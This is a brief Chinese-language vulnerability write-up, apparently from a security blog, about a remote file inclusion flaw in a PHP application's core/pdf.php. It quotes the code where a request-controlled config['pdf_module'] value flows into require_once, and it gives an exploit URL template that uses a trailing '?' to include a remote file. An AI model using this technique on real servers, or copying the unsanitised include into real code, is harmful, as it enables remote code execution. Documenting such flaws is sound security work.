## 1.漏洞分析
```php
define('FPDF', $config['pdf_module']);//这里可控
define('FPDF_FONTPATH', FPDF.'/font/');
require_once FPDF.'/fpdf.php'; //这里包含漏洞
require_once './core/functions.php';
require_once './engines/engines.php';
require_once './core/VariableStream.class.php';
....
```
## 2.漏洞利用
http://[host]/core/pdf.php?config[pdf_module]=[remote]?
这里由于FPDF后面还有/fpdf.php
利用?来直接远程包含
暂无评论